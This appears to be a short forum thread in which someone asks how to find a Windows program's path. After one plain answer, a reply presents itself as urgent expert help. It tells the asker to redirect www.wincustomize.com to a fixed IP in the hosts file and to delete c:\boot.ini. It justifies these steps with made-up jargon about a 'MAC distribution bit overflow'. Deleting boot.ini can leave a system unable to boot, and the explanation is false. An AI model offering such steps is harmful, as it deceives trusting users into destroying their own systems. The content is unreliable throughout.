HOW TO GET TO THE PROGRAM PATH??

There should be a shortcut in your Start menu. Find it and rightclick it, then choose properties.

That is a VERY valuable question. Please ignore the ramblings of these people.

Your issue has been seen in numerous instances and MUST be dealt with rather quickly or you will begin to loose some very critical files. A RARE bug in WB combined with certain hardware manufacturers MAC scheming mechanism is at the root of the problem. There are 2 things you will need to do.
Open C:\WINDOWS\system32\drivers\etc folder, then open the hosts file with notepad. Add the following line.

204.13.161.23 www.wincustomize.com

This will compensate for the internal MAC distribution bit overflow that causes the path disruption.

Second, and most important of all. You need to delete this file from your system.
c:\boot.ini
This may sound harsh, but the comprimised MAC overflow has hijacked this file and exhasperated the 8-bit underflow module which winnt32.exe uses to apply the .ini settings. Your system will re-create the proper file only if you leave the hosts file as I have instructed you to, AND you delete the boot.ini file.
